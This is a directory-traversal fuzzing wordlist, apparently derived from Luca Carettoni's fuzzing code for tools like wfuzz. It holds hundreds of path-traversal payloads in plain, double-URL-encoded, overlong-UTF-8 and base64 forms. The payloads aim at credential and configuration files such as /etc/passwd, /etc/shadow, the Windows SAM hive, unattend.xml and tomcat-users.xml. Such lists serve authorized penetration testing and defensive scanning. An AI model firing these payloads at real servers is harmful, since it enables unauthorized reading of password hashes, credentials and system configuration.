C:\WINDOWS\win.ini
/./\/././\/././\/././\/././\/././\/./
/....\....\....\....\....\....\....\....\
/..../..../..../..../..../..../
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66..%%32%66
C:/xampp/apache/conf/httpd.conf
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/setupinfo.bak
C:/windows/csc/v2.0.6/pq
C:/users/administrator/ntuser.dat
C:/sysprep/sysprep.inf
C:/php4/sessions/
C:/inetpub/logs/logfiles
/sites/defaults/settings.php
/humans.txt
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
\xampp\webdav\webdav.txt
/usr/local/php4/httpd.conf
\log\httpd\access_log
/home2\bin\stable\apache\php.ini
C:\WINDOWS\TEMP\
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
C:\home2\bin\stable\apache\php.ini
\apache2\log\access_log
C:\log\access.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
L2V0Yy9tYXN0ZXIucGFzc3dk
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2fapache2flogs2faccess.log
/WINNT\php.ini
/usr/local/php4/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/NetServer\bin\stable\apache\php.ini
/.logout
/etc/protpd/proftpd.conf
/etc/apache/conf/httpd.conf
db.php
config.js
/C:/inetpub/ftproot/
/./\/./
/....\....\....\
/..../
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/php.ini
C:/windows/panther/unattend/setupinfo
C:/windows/iis6.log (5,6 or 7)
C:/unattended.txt
C:/logs/httpd/error_log
C:/log/access_log
C:/documents and settings/administrator/desktop/desktop.ini
C:/apache2/log/access_log
/wp-content/plugins
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
# Directory Traversal Fuzzing Code
/WINDOWS\php.ini
/etc/protpd/proftpd.conf
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
C:\php5\sessions\
/etc/nginx.conf
C:\log\httpd\access_log
C:\apache2\log\error.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
L2V0Yy9wYXNzd2QlMDA=
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2fapache2flogs2ferror.log
passwd
/etc/system
database.asp
admin/access_log
/./\/././\/././\/././\/././\/././\/././\/./
/........................................................................../
/..../..../..../..../..../..../..../
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66..%%32%66..%%32%66
C:/xampp/tomcat/conf/tomcat-users.xml
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/sysprep.inf
C:/windows/csc/v2.0.6/sm
C:/users/administrator/ntuser.ini
C:/sysprep/sysprep.xml
/phpmyadmin/changelog.php
/style.css
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
# your favourite web application fuzzer (e.g. wfuzz)
/usr/local/php4/httpd.conf
\log\httpd\error_log
/home2\bin\stable\apache\php.ini
C:\WINDOWS\win.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
c:\home\bin\stable\apache\php.ini
\apache2\log\access.log
C:\log\error_log
C:\xampp\webdav\webdav.txt
C:\xampp\apache\conf\httpd.conf
C:\WINDOWS\win.ini
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
L21hc3Rlci5wYXNzd2Q=
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/php4/httpd.conf.php
/home\bin\stable\apache\php.ini
/....\....\
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63..%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/xampp/webdav/webdav.txt
C:/windows/temp/
C:/windows/panther/unattend.xml
C:/windows/panther/unattended.xml
C:/windows/iis6.log
C:/system volume information/wpsettings.dat
C:/php/sessions/
C:\nginx-1.7.4\nginx.conf
C:/logs/httpd/access_log
C:/log/access.log
C:/apache2/log/access.log
wp-admin.php
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/php4/httpd.conf.php
/home\bin\stable\apache\php.ini
C:\WINNT\win.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
C:\WINNT\php.ini
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
L2V0Yy9wYXNzd2Q=
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
/var/www/sitename/htdocs/
pass.dat
/etc/syslogd.conf
d:\AppServ\MySQL
/config.asp
/boot/grub/grub.conf
/.\/\.\
/....\
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/system.ini
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattended.txt
C:/windows/explorer.exe
C:/system32/inetsrv/metabase.xml
C:\nginx-1.7.4\conf\nginx.conf
C:/$recycle.bin/s-1-5-18/desktop.ini
wp-login.php
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
Statement
/var/lib/php/session/sess_<sessid>
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/php4/httpd.conf.php
/NetServer\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/etc/apache/conf/httpd.conf
C:\WINNT\php.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
\apache2\log\error.log
/usr/local/apache2/bin/apachectl
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
ZXRjL3NoYWRvdyUwMA==
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
/.shosts
/etc/wtmp
/etc/nsswitch.conf
d:\System32\Inetsrv\metabase.xml
c:\inetpub\wwwroot\index.asp
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/./\/././\/././\/././\/./
/....\....\....\....\....\....\
/..../..../..../..../
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/%%32%65%%32%65/
C:/winnt/win.ini
C:/windows/repair/software
C:/windows/panther/unattend/sysprep.xml
C:/windows/notepad.exe
C:/unattend.xml
C:/log/httpd/access_log
C:/home2/bin/stable/apache/php.ini
/include/mysql.php
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
# 847 attack vectors, 8 levels of recursion (Unix-like, Windows)
\xampp\tomcat\conf\web.xml
/WINNT\php.ini
/var/db/shadow/hash
/usr/ports/net/pure-ftpd/
\log\error_log
C:\WINDOWS\php.ini
/usr/local/apache2/htdocs/index.html
/opt/lamp/log/access_log
C:\logs\httpd\error_log
C:\apache2\log\access_log
C:\xampp\tomcat\conf\web.xml
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2fapache2flogs2faccess.log
/WINDOWS\php.ini
/var/run/httpd.pid
/var/apache/log
/home2\bin\stable\apache\php.ini
/etc/vfstab
data.php
/./\/././\/././\/././\/././\/././\/././\/././\/./
/..../..../..../..../..../..../..../..../
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/%%32%65%%32%65/
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66..%%32%66..%%32%66..%%32%66
C:/xampp/tomcat/conf/web.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/sysprep.xml
C:/sysprep.xml
C:/php5/sessions/
C:/inetpub/wwwroot/index.asp
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34

/var/lib/php5/session/sess_<sessid>
/NetServer\bin\stable\apache\php.ini
/etc/apache/conf/httpd.conf
c:\WINNT\php.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
C:\php4\sessions\
C:\home\bin\stable\apache\php.ini
\apache2\log\error_log
/usr/local/apache/htdocs/index.html
C:\log\access_log
C:\WINDOWS\php.ini
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
ZXRjL3Bhc3N3ZA==
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
.pass
/etc/netconfig
c:\System32\Inetsrv\metabase.xml
/./\/././\/././\/././\/././\/./
/..........................................................................\
/....\....\....\....\....\....\....\
/..../..../..../..../..../
/%%32%65%%32%65%%35%63
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%32%66
C:/windows/repair/system
C:/windows/panther/unattend.txt
C:/windows/panther/setupinfo
C:/users/administrator/desktop/desktop.ini
C:/sysprep.inf
C:/log/httpd/error_log
C:/home/bin/stable/apache/php.ini
/inc/mysql.php
/robots.txt
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
#
/WINNT\php.ini
/usr/ports/net/pure-ftpd/
\log\error.log
/etc/nginx.conf
C:\WINDOWS\Repair\SAM
C:\php\sessions\
c:\NetServer\bin\stable\apache\php.ini
c:\home2\bin\stable\apache\php.ini
C:\log\error.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2fapache2flogs2ferror.log
/var/run/mysqld/mysqld.pid
passwd.dat
/log/miscDir/accesslog
/etc/rpc
dbase.php a
/./\/././\/./
/....\....\....\....\
/..../..../
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/win.ini
C:/windows/repair/sam
C:/windows/panther/unattend/setupinfo.bak
C:/windows/iis7.log
C:/unattended.xml
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/log/error.log
C:/documents and settings/administrator/ntuser.dat
C:/apache2/log/error.log
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
# Luca "ikki" Carettoni - v0.1
/WINDOWS\php.ini
/usr/local/etc/apache/conf/httpd.conf
\logs\httpd\access_log
\log\access_log
/etc/protpd/proftpd.conf
etc%c0%afpasswd
C:\ProgramFiles\xampp\apache\conf\httpd.conf
C:\log\httpd\error_log
C:\apache2\log\access.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vZXRjL3Bhc3N3ZA==
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2fapache2flogs2faccess.log
/.passwd
/master.passwd
install.php
database.js
config.asp
/admin/install.php
etc%c0%afpasswd
/./\/././\/././\/./
/....\....\....\....\....\
/..../..../..../
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66
/%%32%65%%32%65/
C:/winnt/php.ini
C:/windows/repair/security
C:/windows/panther/unattend/sysprep.inf
C:/windows/iis8.log
C:/unattend.txt
C:/programfiles/xampp/apache/conf/httpd.conf
C:/log/error_log
C:/documents and settings/administrator/ntuser.ini
C:/apache2/log/error_log
# separate fuzzfile for more flexibiity 
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
#
\xampp\tomcat\conf\tomcat-users.xml
\xampp\apache\conf\httpd.conf
/usr/local/etc/apache/conf/httpd.conf
\logs\httpd\error_log
\log\access.log
/etc/release
c:\WINDOWS\php.ini
/usr/local/apache/bin/apachectl
C:\logs\httpd\access_log
C:\apache2\log\error_log
C:\xampp\tomcat\conf\tomcat-users.xml
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2fapache2flogs2ferror.log
/var/lock/samba
/usr/ports/net/pure-ftpd/
users.db.php
.passwd
/etc/release
/etc/make.conf
database.php
c:\AppServ\MySQL